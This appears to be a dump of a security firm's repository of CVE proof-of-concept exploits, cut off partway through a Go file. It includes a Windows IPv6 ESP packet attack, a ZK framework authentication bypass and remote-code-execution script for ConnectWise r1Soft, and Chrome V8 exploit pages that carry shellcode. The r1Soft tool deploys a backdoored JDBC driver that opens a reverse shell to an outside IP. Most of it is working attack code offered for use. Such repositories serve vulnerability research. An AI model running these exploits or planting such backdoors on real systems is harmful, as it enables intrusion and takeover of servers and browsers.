Repository: numencyber/Vulnerability_PoC
Branch: main
Commit: 8fccb7c069f9
Files: 20
Total size: 16.5 MB
Directory structure:
gitextract_jn422405/
├── CVE-2022-34718/
│ └── poc.cpp
├── CVE-2022-36537/
│ ├── Driver.java
│ ├── chromedriver
│ ├── cve-2022-36537.py
│ ├── mysql-connector-java-5.1.48.jar
│ └── requirements.txt
├── CVE-2022-3723/
│ ├── 01.html
│ ├── Readme.md
│ ├── arr.html
│ ├── exp.html
│ ├── go.mod
│ ├── go.sum
│ └── mainHttps.go
├── CVE-2023-23410/
│ └── CVE-2023-23410_poc.c
├── CVE-2023-28231/
│ └── CVE-2023-28231-DHCP-VUL-PoC.cpp
├── CVE-2023-29336/
│ └── poc.cpp
├── CVE-2023-41047/
│ └── CVE-2023-41047.go
├── CVE-2024-24919/
│ └── exp.py
├── CVE-2026-5283/
│ └── poc.html
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: CVE-2022-34718/poc.cpp
================================================
////////////////////////////////////////////////
// ScannerDemo.cpp文件
#include "../common/initsock.h"
#include <windows.h>
#include <stdio.h>
#include "ntddndis.h"
#include "protoutils.h"
#include "ProtoPacket.h"
#include <Stdint.h>
#include "Iphlpapi.h"
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib, "Bcrypt.lib")
#include "../common/comm.h"
DWORD WINAPI SendThread(LPVOID lpParam);
BOOL GetGlobalData();
u_char g_ucLocalMac[6];
DWORD g_dwGatewayIP;
DWORD g_dwLocalIP;
DWORD g_dwMask;
CInitSock theSock;
BCRYPT_ALG_HANDLE m_hAesAlg;
BCRYPT_KEY_HANDLE m_hKey;
PBYTE m_pbKeyObject;
PBYTE m_pbIV;
//Handle for Hash
BCRYPT_HASH_HANDLE m_hHash;
PBYTE m_pbHashObject;
BCRYPT_ALG_HANDLE m_hHashAlg;
BYTE rgbHash[0x14];
UCHAR str_SHA1_key[] =
"\xbc\x3d\x6e\x74\x2d\xd2\x13\xbe\x0b\xa9\x42\xb7\x33\xa4\x7a\xf4\x9b\xa2\xa8\x90";
UINT32 spi = htonl(0x861b157c);
void SHA1(PUCHAR str_data, DWORD len)
{
BCRYPT_KEY_HANDLE hKey = NULL;
DWORD cbHashObject, cbResult, temp = 0;
DWORD cbData = 0;
BCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8);
// Determine the size of the Hash object
BCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0);
m_pbHashObject = (PBYTE)malloc(cbHashObject);
// Create the Hash object
BCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0);
// Hash the data
BCryptHashData(m_hHash, (PBYTE)str_data, len, 0);
// Finish the hash
BCryptFinishHash(m_hHash, rgbHash, 0x14, 0);
return ;
}
BOOL GetGlobalData()
{
PIP_ADAPTER_INFO pAdapterInfo = NULL;
ULONG ulLen = 0;
::GetAdaptersInfo(pAdapterInfo, &ulLen);
pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);
if (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS)
{
if (pAdapterInfo != NULL)
{
memcpy(g_ucLocalMac, pAdapterInfo->Address, 6);
g_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String);
g_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String);
g_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String);
}
}
::GlobalFree(pAdapterInfo);
return TRUE;
}
int main()
{
GetGlobalData();
if (!ProtoStartService())
{
printf(" ProtoStartService() failed %d \n", ::GetLastError());
return -1;
}
HANDLE hControlDevice = ProtoOpenControlDevice();
if (hControlDevice == INVALID_HANDLE_VALUE)
{
printf(" ProtoOpenControlDevice() failed() %d \n", ::GetLastError());
ProtoStopService();
return -1;
}
CPROTOAdapters adapters;
if (!adapters.EnumAdapters(hControlDevice))
{
printf(" Enume adapter failed \n");
ProtoStopService();
return -1;
}
CAdapter adapter;
if (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE))
{
printf(" OpenAdapter failed \n");
ProtoStopService();
return -1;
}
adapter.SetFilter( // NDIS_PACKET_TYPE_PROMISCUOUS|
NDIS_PACKET_TYPE_DIRECTED |
NDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST);
UCHAR ipv6_ESP_Fragment_1[] =
"\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
"\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
"\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
"\x70\x83\x16\x6f\xef\x6b"
"\x41\x41\x41\x41\x00\x00\x00\x21"//SPI+Seq
"\x2c\x00\x00\x01\x52\x52\x52\x52\x32\x00\x00\x01\x96\x74\xd9\x9d"
"\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
"\x01\x02\x02\x2c"//ESP tail
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
UCHAR ipv6_ESP_Fragment_2[] =
"\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
"\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
"\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
"\x70\x83\x16\x6f\xef\x6b"
"\x41\x41\x41\x41\x00\x00\x00\x22"//SPI+Seq
"\x2c\x00\x00\x18\x52\x52\x52\x52\x32\x00\x00\x00\x96\x74\xd9\x9d"
"\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
"\x01\x02\x02\x2c"//ESP tail
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
memcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4);
SHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c);
memcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c);
memcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4);
SHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c);
memcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c);
adapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1);
adapter.SendData(ipv6_ESP_Fragment_2, sizeof(ipv6_ESP_Fragment_2)-1);
ProtoStopService();
return 0;
}
================================================
FILE: CVE-2022-36537/Driver.java
================================================
package com.mysql.jdbc;
import java.sql.*;
import java.util.*;
import java.util.logging.Logger;
/*
author: Bearcat of www.numencyber.com
desc : Mysql jdbc backdoor driver
*/
public class Driver implements java.sql.Driver {
static {
String winCmd = "calc";
String linuxCmd = "bash -i >& /dev/tcp/192.168.1.3/2022 0>&1";
String[] cmds = null;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
cmds = new String[]{"cmd.exe", "/c", winCmd};
} else {
cmds = new String[]{"/bin/bash", "-c", linuxCmd};
}
try {
Runtime.getRuntime().exec(cmds);
} catch (Exception ignored) {
// do nothing...
}
}
@Override
public Connection connect(String url, Properties info) throws SQLException {
return null;
}
@Override
public boolean acceptsURL(String url) throws SQLException {
return false;
}
@Override
public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
return new DriverPropertyInfo[0];
}
@Override
public int getMajorVersion() {
return 0;
}
@Override
public int getMinorVersion() {
return 0;
}
@Override
public boolean jdbcCompliant() {
return false;
}
@Override
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
return null;
}
}
================================================
FILE: CVE-2022-36537/chromedriver
================================================
[File too large to display: 16.4 MB]
================================================
FILE: CVE-2022-36537/cve-2022-36537.py
================================================
#!/usr/bin/env python3
# coding: utf-8
"""
@File : cve-2022-36537.py
@Time : 2022/11/11 23:34
@Author : Bearcat of www.numencyber.com
@Version : 1.0
@Desc : ZK framework authentication bypass & connectWise r1Soft server backup manager remote code execution.
"""
import sys
import subprocess
import os
import warnings
import re
import zipfile
import shutil
import requests
from requests_toolbelt import MultipartEncoder
import urllib3
from selenium import webdriver
from rich import print as rprint
import argparse
urllib3.disable_warnings()
# proxy = {
# "http": "http://127.0.0.1:8080"
# }
proxy = {}
# https://chromedriver.storage.googleapis.com/index.html?path=107.0.5304.62/
def bypass_auth1(target):
warnings.warn("Discard. The bypass auch2 function is simpler to obtain dtid and cookies.", DeprecationWarning)
rprint("[italic green][*] Bypass authentication.")
try:
opt = webdriver.ChromeOptions()
opt.add_argument('--headless')
opt.add_argument('--ignore-certificate-errors')
driver = webdriver.Chrome(executable_path='./chromedriver', options=opt)
driver.get(target)
cookie_str = "JSESSIONID=" + driver.get_cookie("JSESSIONID")['value']
dtid = driver.execute_script("""
for (var dtid in zk.Desktop.all)
return dtid
""")
return dtid, cookie_str
except Exception as e:
rprint("[italic red][-] Bypass authentication failed. {0}".format(e))
exit()
def bypass_auth2(target):
rprint("[italic green][*] Bypass authentication.")
uri = "{0}/login.zul".format(target)
try:
result = requests.get(url=uri, timeout=3, verify=False, proxies=proxy)
cookie_str = result.headers['Set-Cookie'].split(";")[0]
r = u"dt:'(.*?)',cu:"
regex = re.compile(r)
dtid = regex.findall(result.text)[0]
return dtid, cookie_str
except Exception as e:
rprint("[italic red][-] Bypass authentication failed. {0}".format(e))
exit()
def forward_request(target, next_uri, cookie_str, uuid, dtid):
uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, uuid, dtid)
param = {"nextURI": (None, next_uri)}
headers = {"Cookie": cookie_str}
data = MultipartEncoder(param, boundary="----WebKitFormBoundaryCs6yB0zvpfSBbYEp")
headers["Content-Type"] = data.content_type
try:
result = requests.post(url=uri, headers=headers, data=data.to_string(), timeout=3, verify=False, proxies=proxy)
return result
except Exception as e:
rprint("[italic red][-] Forward request failed. {0}".format(e))
exit()
def read_file(target, filename):
# get login_dtid
login_dtid, cookie_str = bypass_auth2(target)
rprint("[italic green][*] Start reading the file:")
result = forward_request(target, filename, cookie_str, "101010", login_dtid)
return "-----file start-----\n{0}\n-----file end-----".format(result.text)
def deploy_jdbc_backdoor(target):
rprint(
"[italic red][!] The jdbc backdoor can only be deployed once, please make it persistent, such as rebounding the shell.")
play_again = input("Whether to continue? (y/n):").lower()
if play_again[0] != "y":
exit()
# get login_dtid
login_dtid, cookie_str = bypass_auth2(target)
rprint("[italic green][*] Start deploying the jdbc backdoor.")
build_jdbc_backdoor()
# database_dtid and mysql_driver_upload_button_id
uri = "/Configuration/database-drivers.zul"
result = forward_request(target, uri, cookie_str, "101010", login_dtid)
r1 = u"{dt:'(.*?)',cu:"
regex = re.compile(r1)
database_dtid = regex.findall(result.text)[0]
r1 = u"'zul.wgt.Button','(.*?)',"
regex = re.compile(r1)
mysql_driver_upload_button_id = regex.findall(result.text)[0]
uri = "/zkau?dtid={0}&cmd_0=onClick&uuid_0={1}&data_0=%7B%22pageX%22%3A315%2C%22pageY%22%3A120%2C%22which%22%3A1%2C%22x%22%3A39%2C%22y%22%3A23%7D".format(
database_dtid, mysql_driver_upload_button_id)
result = forward_request(target, uri, cookie_str, "101010", login_dtid)
# file_upload_dlg_id and file_upload_id
r1 = u"zul.fud.FileuploadDlg','(.*?)',"
regex = re.compile(r1)
file_upload_dlg_id = regex.findall(result.text)[0]
r1 = u"zul.wgt.Fileupload','(.*?)',"
regex = re.compile(r1)
file_upload_id = regex.findall(result.text)[0]
uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, file_upload_id, database_dtid)
upload_jdbc_backdoor(uri, cookie_str)
uri = "/zkau?dtid={0}&cmd_0=onMove&opt_0=i&uuid_0={1}&data_0=%7B%22left%22%3A%22716px%22%2C%22top%22%3A%22100px%22%7D&cmd_1=onZIndex&opt_1=i&uuid_1={2}&data_1=%7B%22%22%3A1800%7D&cmd_2=updateResult&data_2=%7B%22contentId%22%3A%22z__ul_0%22%2C%22wid%22%3A%22{3}%22%2C%22sid%22%3A%220%22%7D".format(
database_dtid, file_upload_dlg_id, file_upload_dlg_id, file_upload_id)
forward_request(target, uri, cookie_str, "101010", login_dtid)
uri = "/zkau?dtid={0}&cmd_0=onClose&uuid_0={1}&data_0=%7B%22%22%3Atrue%7D".format(database_dtid,
file_upload_dlg_id)
forward_request(target, uri, cookie_str, "101010", login_dtid)
def upload_jdbc_backdoor(uri, cookie_str):
rprint("[italic green][*] Upload the database driver.")
headers = {"Cookie": cookie_str}
files = {'file': ('b.jar', open('jdbc_backdoor.jar', 'rb'), 'application/java-archive')}
try:
requests.post(uri, files=files, headers=headers, timeout=6, verify=False, proxies=proxy)
except Exception as e:
rprint("[italic red][-] Upload the database driver failed. {0}".format(e))
exit()
def build_jdbc_backdoor():
rprint("[italic green][*] Compile java code.")
java_cmd = 'javac -source 1.5 -target 1.5 Driver.java'
popen = subprocess.Popen(java_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
popen.stdout.read()
tmp_path = 'jdbc_jar'
os.mkdir(tmp_path)
with zipfile.ZipFile('mysql-connector-java-5.1.48.jar', 'r', zipfile.ZIP_DEFLATED) as unzf:
unzf.extractall("jdbc_jar")
unzf.close()
os.remove('jdbc_jar/com/mysql/jdbc/Driver.class')
shutil.copy('Driver.class', 'jdbc_jar/com/mysql/jdbc/')
with zipfile.ZipFile('jdbc_backdoor.jar', 'w', zipfile.ZIP_DEFLATED) as zf:
for root, dirs, files in os.walk(tmp_path):
relative_root = '' if root == tmp_path else root.replace(tmp_path, '') + os.sep
for filename in files:
zf.write(os.path.join(root, filename), relative_root + filename)
zf.close()
shutil.rmtree(tmp_path)
rprint("[italic green][*] Build jdbc backdoor success.")
def banner():
rprint("[italic white]CVE-2022-36537:\n\tZK framework authentication bypass")
rprint("[italic white]\tConnectWise r1Soft server backup manager remote code execution")
def parse_args():
parser = argparse.ArgumentParser(prog='cve-2022-36537',
formatter_class=argparse.RawTextHelpFormatter,
description='author: Bearcat of www.numencyber.com',
usage='cve-2022-36537.py [options]')
parser.add_argument('-u', '--url', type=str, default='', help='target url')
parser.add_argument('-r', '--read', type=str, default='', help='reading the file')
parser.add_argument('-b', '--build', action="store_true", help='build jdbc backdoor')
parser.add_argument('-d', '--deploy', action="store_true", help='deploying the jdbc backdoor')
if len(sys.argv) == 1:
sys.argv.append('-h')
args = parser.parse_args()
return args
if __name__ == '__main__':
banner()
args = parse_args()
if args.url and args.read:
print(read_file(args.url, args.read))
exit()
if args.build:
build_jdbc_backdoor()
exit()
if args.url and args.deploy:
deploy_jdbc_backdoor(args.url)
exit()
================================================
FILE: CVE-2022-36537/requirements.txt
================================================
requests==2.28.1
requests_toolbelt==0.10.1
rich==12.6.0
selenium==4.7.2
urllib3==1.25.3
================================================
FILE: CVE-2022-3723/01.html
================================================
<body>
<div id="iframeContainer"></div>
</body>
<script>
var arr = [2.2, 2.2];
window.onload = function () {
let frame = document.createElement("iframe");
// 基本设置
frame.src = "arr.html"; // iframe 的来源
frame.height = "300px"; // iframe 的高度
frame.width = "300px"; // iframe 的宽度
// 将 iframe 插入到 HTML 文档中
let container = document.getElementById("iframeContainer");
container.appendChild(frame);
alert(1);
% DebugPrint(arr);
alert(2);
let frame2 = document.createElement("iframe");
// 基本设置
frame2.src = "exp.html"; // iframe 的来源
frame2.height = "300px"; // frame2 的高度
frame2.width = "300px"; // frame2 的宽度
// 将 frame2 插入到 HTML 文档中
container.appendChild(frame2);
alert(1);
% DebugPrint(arr);
alert(2);
};
</script>
================================================
FILE: CVE-2022-3723/Readme.md
================================================
exploit of CVE-2022-3723
based on google's public poc
================================================
FILE: CVE-2022-3723/arr.html
================================================
<script>
var dv = new DataView(new ArrayBuffer(0x10));
function gc() {
for (var i = 0; i < 0x100; i++) new Array(0x200);
}
const to_hex = num => {
return (num >> 0n).toString(16);
}
function biglow(b) {
dv.setBigUint64(0, b, true);
return (dv.getUint32(0, true));
}
function bighi(b) {
dv.setBigUint64(0, b, true);
return (dv.getUint32(4, true));
}
function f2big(f) {
dv.setFloat64(0, f, true);
return (dv.getBigUint64(0, true));
}
function big2f(b) {
dv.setBigUint64(0, b, true);
return dv.getFloat64(0, true);
}
function flow(f) {
dv.setFloat64(0, f, true);
return (dv.getUint32(0, true));
}
function fhi(f) {
dv.setFloat64(0, f, true);
return (dv.getUint32(4, true));
}
function i2f(low, hi) {
dv.setUint32(0, low, true);
dv.setUint32(4, hi, true);
return dv.getFloat64(0, true);
}
function majorGc() {
var arr_stack = [];
for (let i = 0; i < 80; i++) {
try {
arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));
} catch (msg) {
break;
}
}
}
class LeakArrayBuffer extends ArrayBuffer {
constructor(size) {
super(size);
this.rw = [1.7, 1.7];// 0x3ffb333333333333
this.slot = 0xb33f;//搜索0x1667E,查看改变位置,为leakObj地方
}
}
let shellcode = [2.222372952568011e+127,
3.4476922241098093e+40,
-2.5784757691472832e-254,
-1.476674265851898e-90,
2.582607795529539e-293,
2.4887534188622283e+253,
9.353354960368843e-158,
1.772861363575525e-297,
2.941218276584707e+26,
1.7578789445410664e-302,
-1.3535215646275278e-183,
1.19831254e-314];
var arr = null;
var buff = null;
for (let i = 0; i < 0x1000; i++) {
arr = new Array(1.1, 1.1);
buff = new LeakArrayBuffer(0x1337);
}
majorGc(); gc(); majorGc(); gc(); majorGc(); gc(); majorGc(); gc();
{
function leak() {
function setInnerProperty(o, obj) {
for (let m = 0; m < 0x100000; m++) {
o.inner.foo = obj;
}
}
function foo(str, addr) {
var o = {
inner: {
['foo']: 1.5
}
};
eval(str);// eval防止内联
// o.inner.foo = addr;
return o.inner.foo;
// return arr;
};
% PrepareFunctionForOptimization(foo);
// optimize setInnerProperty
foo("setInnerProperty(o, arr);", 1.4);
majorGc();
foo("setInnerProperty(o, arr);", 1.4);
majorGc();
% OptimizeFunctionOnNextCall(foo);
let o = foo("setInnerProperty(o, arr);", 1.4);
// console.log(f2big(o).toString(16));
return (f2big(o).toString(16));
}
let addr = leak();
fetch(addr, {
method: 'GET',
mode: 'no-cors' // 在开发环境中允许不安全连接
})
.then(response => {
% DebugPrint("fuckhere");
% DebugPrint(arr);
}) // 你也可以使用 response.json() 如果你知道响应会是 JSON 格式的
.then(data => {
new Promise((resolve, reject) => {
setTimeout(() => {
resolve();
}, 2000);
}).then(() => {
if (arr.length !== 2) {
alert("length is changed!!check how to exp");
console.log("length is changed!!check how to exp");
function leakObj(o) {
buff.slot = o;
return fhi(arr[10]);
}
function write(addr_low, val) {
arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));
buff.rw[0] = val;
}
function read(addr_low) {
arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));
return buff.rw[0];
}
// randPE_addr = read(function_slot);
// alert(f2big(randPE_addr).toString(16).padStart(16, 0));
arr_addr = leakObj(shellcode);
raw_shellcode_addr = ((flow(read(arr_addr + 0x8))) | 1) - 1 + 0x8;
% DebugPrint(shellcode);
alert("raw_shellcode_addr:" + raw_shellcode_addr.toString(16).padStart(8, 0));
fetch(raw_shellcode_addr.toString(16).padStart(8, 0)+".wasm")
.then((response) => response.arrayBuffer())
.then((wasmBinary) => WebAssembly.compile(wasmBinary))
.then((wasmModule) => WebAssembly.instantiate(wasmModule))
.then((wasmInstance) => {
const { f } = wasmInstance.exports;
% DebugPrint("wasmInstance addr is:");
% DebugPrint(wasmInstance);
wasmInstance_addr = leakObj(wasmInstance);
alert("wasmInstance_addr:"+wasmInstance_addr.toString(16).padStart(8,0));
rx_mem_addr = f2big(read(wasmInstance_addr + 0x60));
alert("rx_mem_addr:"+rx_mem_addr.toString(16).padStart(16,0));
rop_start=rx_mem_addr+0x65dn;
// 泄露function地址,修改 backingStore
% DebugPrint("main func addr is:");
% DebugPrint(f);
faddr = leakObj(f);
alert("f addr:" + faddr.toString(16).padStart(8, 0));
function_slot = flow(read(faddr + 0x18)) + 0x10;
alert("function_slot and go to mem to check addr:" + function_slot.toString(16).padStart(8, 0));
write(function_slot,big2f(rop_start));
alert("check memory");
f();
});
}
});
})
.catch(error => {
// 在这里处理任何上面的.then()中发生的错误
console.error('Error:', error);
});
}
</script>
================================================
FILE: CVE-2022-3723/exp.html
================================================
<script>
var arr = [2.2, 2.2];
function exp() {
var dv = new DataView(new ArrayBuffer(0x10));
function gc() {
for (var i = 0; i < 0x100; i++) new Array(0x200);
}
const to_hex = num => {
return (num >> 0n).toString(16);
}
function biglow(b) {
dv.setBigUint64(0, b);
return (dv.getUint32(0, true));
}
function bighi(b) {
dv.setBigUint64(0, b);
return (dv.getUint32(4, true));
}
function f2big(f) {
dv.setFloat64(0, f);
return (dv.getBigUint64(0, true));
}
function big2f(b) {
dv.setBigUint64(0, b, true);
return dv.getFloat64(0);
}
function flow(f) {
dv.setFloat64(0, f, true);
return (dv.getUint32(0, true));
}
function fhi(f) {
dv.setFloat64(0, f, true);
return (dv.getUint32(4, true));
}
function i2f(low, hi) {
dv.setUint32(0, low, true);
dv.setUint32(4, hi, true);
return dv.getFloat64(0, true);
}
function majorGc() {
var arr_stack = [];
for (let i = 0; i < 80; i++) {
try {
arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));
} catch (msg) {
break;
}
}
}
function main() {
var arr = [1.1, 1.1];
function setInnerProperty(o, obj) {
for (let m = 0; m < 0x100000; m++) {
o.inner.foo = obj;
}
}
// % PrepareFunctionForOptimization(setInnerProperty);
// % OptimizeFunctionOnNextCall(setInnerProperty);
function setaddr(str, addr, flag) {
var o = {
inner: {
['foo']: 1.5
}
};
eval(str);// eval防止内联
if (flag) {
console.log("fuckme");
console.log(o.inner.foo)
}
o.inner.foo = addr;
// return o.inner.foo;
return arr;
};
% PrepareFunctionForOptimization(setaddr);
// optimize setInnerProperty
setaddr("setInnerProperty(o, arr,false);", xxx);
majorGc();
setaddr("setInnerProperty(o, arr,false);", xxx);
majorGc();
% OptimizeFunctionOnNextCall(setaddr);
// % DebugPrint(arr);
//
let o = setaddr("setInnerProperty(o, arr,true);", xxx);
%DebugPrint("fuck");
% DebugPrint(o);
alert("go to change length");
o[0]=i2f(flow(o[0]),0x40);
alert("check Length");
}
main();
};
exp();
</script>
================================================
FILE: CVE-2022-3723/go.mod
================================================
module httpsServer
go 1.20
require github.com/bytecodealliance/wasmtime-go/v8 v8.0.0
================================================
FILE: CVE-2022-3723/go.sum
================================================
github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 h1:jP4sqm2PHgm3+eQ50zCoCdIyQFkIL/Rtkw6TT8OYPFI=
github.com/bytecodealliance/wasmtime-go/v8 v8.0.0/go.mod h1:tgazNLU7xSC2gfRAM8L4WyE+dgs5yp9FF5/tGebEQyM=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/niemeyer/pretty v0.0.0-20200227124842-a10e7caefd8e h1:fD57ERR4JtEqsWbfPhv4DMiApHyliiK5xCTNVSPiaAs=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk=
gopkg.in/check.v1 v1.0.0-20200902074654-038fdea0a05b h1:QRR6H1YWRnHb4Y/HeNFCTJLFVxaq6wH4YuVdsUOr75U=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
================================================
FILE: CVE-2022-3723/mainHttps.go
================================================
package main
import (
"errors"
"flag"
"fmt"
"github.com/bytecodealliance/wasmtime-go/v8"
"io/ioutil"
"log"
"math"
"net/http"
"os"
"path"
"path/filepath"
"regexp"
"strconv"
"strings"
)
var globalFloat float64 = -1
var wasm_code = `
(module
(func $f (export "f") (param i64)
(call $f (i64.const 0x12EB9060B0C03148)) ;; 48 31 C0 B0 60 90 EB 12 12EB9060B0C03148
(call $f (i64.const 0x0BEB9090008B4865)) ;; 65 48 8B 00 90 90 EB 0B 0BEB9090008B4865
(call $f (i64.const 0x0BEB909018408B48)) ;; 48 8B 40 18 90 90 EB 0B 0BEB909018408B48
(call $f (i64.const 0x0BEB909030408B48)) ;; 48 8B 40 30 90 90 EB 0B 0BEB909030408B48
(call $f (i64.const 0x0BEBc08b48C08548)) ;; 48 85 C0 48 8b c0 EB 0B 0BEBc08b48C08548
(call $f (i64.const 0x0BEB000002D1840F)) ;; 0F 84 D1 02 00 00 EB 0B 0BEB000002D1840F
(call $f (i64.const 0x0BEB9000320033BA)) ;; BA 33 00 32 00 90 EB 0B 0BEB9000320033BA
(call $f (i64.const 0x0BEB909020E2C148)) ;; 48 C1 E2 20 90 90 EB 0B 0BEB909020E2C148
(call $f (i64.const 0x0BEB90004C0045B9)) ;; B9 45 00 4C 00 90 EB 0B 0BEB90004C0045B9
(call $f (i64.const 0x0BEBdb8b48CA0148)) ;; 48 01 CA 48 8b db EB 0B 0BEBdb8b48CA0148
(call $f (i64.const 0x0BEB004E0052B941)) ;; 41 B9 52 00 4E 00 EB 0B 0BEB004E0052B941
(call $f (i64.const 0x0BEB909020E1C149)) ;; 49 C1 E1 20 90 90 EB 0B 0BEB909020E1C149
(call $f (i64.const 0x0BEB900045004BB9)) ;; B9 4B 00 45 00 90 EB 0B 0BEB900045004BB9
(call $f (i64.const 0x0BEBc98b48C90149)) ;; 49 01 C9 48 8b c9 EB 0B 0BEBc98b48C90149
(call $f (i64.const 0x0BEB004C004CB841)) ;; 41 B8 4C 00 4C 00 EB 0B 0BEB004C004CB841
(call $f (i64.const 0x0BEB909020E0C149)) ;; 49 C1 E0 20 90 90 EB 0B 0BEB909020E0C149
(call $f (i64.const 0x0BEB900044002EB9)) ;; B9 2E 00 44 00 90 EB 0B 0BEB900044002EB9
(call $f (i64.const 0x0BEBf68b48C80149)) ;; 49 01 C8 48 8b f6 EB 0B 0BEBf68b48C80149
(call $f (i64.const 0x0BEB909040488B48)) ;; 48 8B 48 40 90 90 EB 0B 0BEB909040488B48
(call $f (i64.const 0x0BEB904774C98548)) ;; 48 85 C9 74 47 90 EB 0B 0BEB904774C98548
(call $f (i64.const 0x0BEB90347509394C)) ;; 4C 39 09 75 34 90 EB 0B 0BEB90347509394C
(call $f (i64.const 0x0BEB207508513948)) ;; 48 39 51 08 75 20 EB 0B 0BEB207508513948
(call $f (i64.const 0x0BEB22741041394C)) ;; 4C 39 41 10 74 22 EB 0B 0BEB22741041394C
(call $f (i64.const 0x0BEBC08548008B48)) ;; 48 8B 00 48 85 C0 EB 0B 0BEBC08548008B48
(call $f (i64.const 0x0BEB10488B488C75)) ;; 75 8C 48 8B 48 10 EB 0B 0BEB10488B488C75
(call $f (i64.const 0x0BEB90903C416348)) ;; 48 63 41 3C 90 90 EB 0B 0BEB90903C416348
(call $f (i64.const 0x0BEBC80148C98949)) ;; 49 89 C9 48 01 C8 EB 0B 0BEBC80148C98949
(call $f (i64.const 0x0BEB000000880548)) ;; 48 05 88 00 00 00 EB 0B 0BEB000000880548
(call $f (i64.const 0x0BEB9090C031108B)) ;; 8B 10 31 C0 90 90 EB 0B 0BEB9090C031108B
(call $f (i64.const 0x0BEBff8b48CA0148)) ;; 48 01 CA 48 8b ff EB 0B 0BEBff8b48CA0148
(call $f (i64.const 0x0BEB909018528B44)) ;; 44 8B 52 18 90 90 EB 0B 0BEB909018528B44
(call $f (i64.const 0x0BEB909020428B44)) ;; 44 8B 42 20 90 90 EB 0B 0BEB909020428B44
(call $f (i64.const 0x0BEB9090245A8B44)) ;; 44 8B 5A 24 90 90 EB 0B 0BEB9090245A8B44
(call $f (i64.const 0x0BEB1c528bC80149)) ;; 49 01 C8 8b 52 1c EB 0B 0BEB1c528bC80149
(call $f (i64.const 0x0BEBCA0148CB0149)) ;; 49 01 CB 48 01 CA EB 0B 0BEBCA0148CB0149
(call $f (i64.const 0x0BEBc98b4dD28545)) ;; 45 85 D2 4d 8b c9 EB 0B 0BEBc98b4dD28545
(call $f (i64.const 0x0BEB00000092840F)) ;; 0F 84 92 00 00 00 EB 0B 0BEB00000092840F
(call $f (i64.const 0x0BEB90506C6175BB)) ;; BB 75 61 6C 50 90 EB 0B 0BEB90506C6175BB
(call $f (i64.const 0x0BEB909020E3C148)) ;; 48 C1 E3 20 90 90 EB 0B 0BEB909020E3C148
(call $f (i64.const 0x0BEB9074726956BE)) ;; BE 56 69 72 74 90 EB 0B 0BEB9074726956BE
(call $f (i64.const 0x0BEB088B41F30148)) ;; 48 01 F3 41 8B 08 EB 0B 0BEB088B41F30148
(call $f (i64.const 0x0BEB4674091C394A)) ;; 4A 39 1C 09 74 46 EB 0B 0BEB4674091C394A
(call $f (i64.const 0x0BEB04C08349C0FF)) ;; FF C0 49 83 C0 04 EB 0B 0BEB04C08349C0FF
(call $f (i64.const 0x0BEB90C572D03944)) ;; 44 39 D0 72 C5 90 EB 0B 0BEB90C572D03944
(call $f (i64.const 0x0BEBd28b4dC3C031)) ;; 31 C0 C3 4d 8b d2 EB 0B 0BEBd28b4dC3C031
(call $f (i64.const 0x0BEB904304B70F41)) ;; 41 0F B7 04 43 90 EB 0B 0BEB904304B70F41
